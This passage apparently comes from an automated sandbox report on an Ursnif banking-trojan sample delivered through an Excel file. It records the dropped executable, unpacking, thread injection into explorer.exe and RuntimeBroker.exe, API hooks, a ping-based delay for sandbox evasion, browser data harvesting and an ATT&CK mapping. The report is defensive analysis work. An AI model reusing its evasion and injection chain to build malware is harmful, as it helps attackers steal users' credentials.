Source:	Binary string: ntdll.pdbUGP source: CVPFktt.exe, 00000005.00000003.866377474.0000000003E70000.00000004.00000001.sdmp
Source:	Binary string: VC:\pivowutikaperoso\xaxe.pdbime\crypt\tmp_1452187773\bin\hoxita.pdb source: CVPFktt.exe, 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000013.00000002.932010411.000001E6C545C000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000013.00000002.932010411.000001E6C545C000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000014.00000000.910759401.0000000005230000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Unpacked PE file: 5.2.CVPFktt.exe.400000.0.unpack .text:ER;.data:W;.pevidu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Unpacked PE file: 5.2.CVPFktt.exe.400000.0.unpack

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001C109B LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

5_2_001C109B

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001E1497 push ecx; ret	5_2_001E14A7
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001E0F90 push ecx; ret	5_2_001E0F99
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041C848 push ss; retf 0001h	5_2_0041C82D
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041C85C push cs; retf	5_2_0041C861
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041C864 push esp; retf	5_2_0041C86D
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041C83C pushfd ; retf 0001h	5_2_0041C845
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_00411D45 push ecx; ret	5_2_00411D58
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041C7C2 push ss; retf 0001h	5_2_0041C82D
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_00AB4451 push es; ret	5_2_00AB4470

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\sxibiNa\ZpsvnMb\CVPFktt.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\0n1ine[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFCE13E521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFCE13E5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

API coverage: 9.9 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C8069 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	5_2_001C8069
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DB8FF RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,LdrInitializeThunk,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	5_2_001DB8FF
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D5A05 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	5_2_001D5A05
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D9F28 LdrInitializeThunk,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	5_2_001D9F28
Source: C:\Windows\explorer.exe	Code function: 20_2_05377BE4 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,	20_2_05377BE4

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

5_2_001C580F

Source: explorer.exe, 00000014.00000002.984980620.0000000006F60000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000014.00000002.984980620.0000000006F60000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000014.00000002.984980620.0000000006F60000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000014.00000002.984980620.0000000006F60000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_004010D8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

5_2_004010D8

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001C109B LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

5_2_001C109B

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_004011AA InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,	5_2_004011AA
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001CEE1C StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	5_2_001CEE1C
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_00410B5B SetUnhandledExceptionFilter,	5_2_00410B5B

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Memory allocated: C:\Windows\System32\control.exe base: 460000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 640000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 20620C00000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2086E4E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1456B1C0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D62B7F0000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FF742841000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FF742841000 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FF742841000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 42841000
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: D46C1000
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: D46C1000
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: D46C1000

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\control.exe	Memory written: PID: 3760 base: 7FF742841000 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3760 base: 640000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3760 base: 7FF742841000 value: 48

Maps a DLL or memory area into another process

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Thread register set: target process: 4404	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3760
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5864
Source: C:\Windows\explorer.exe	Thread register set: target process: 3208
Source: C:\Windows\explorer.exe	Thread register set: target process: 4328
Source: C:\Windows\explorer.exe	Thread register set: target process: 4964

Writes to foreign memory regions

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Memory written: C:\Windows\System32\control.exe base: 460000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FF742841000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 640000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FF742841000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7F7725FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 20620C00000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7F7725FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2086E4E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1456B1C0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D62B7F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF6D46C1000

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: Yara match

File source: bonifico__8156.xls, type: SAMPLE

Source: explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.912661873.0000000006DB0000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndx
Source: explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	Binary or memory string: 7Program Manager
Source: explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001C9A1F cpuid

5_2_001C9A1F

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001CA4B9 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

5_2_001CA4B9

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_004010D8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

5_2_004010D8

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001C15C3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,LdrInitializeThunk,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

5_2_001C15C3

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_00401210 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

5_2_00401210

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings

Show sources

Source: C:\Windows\explorer.exe

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\prefs.js

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\prefs.js

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	Hooking3	Hooking3	Software Packing21	Credential Dumping1	System Time Discovery1	Remote File Copy11	Man in the Browser1	Data Encrypted1	Remote File Copy11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
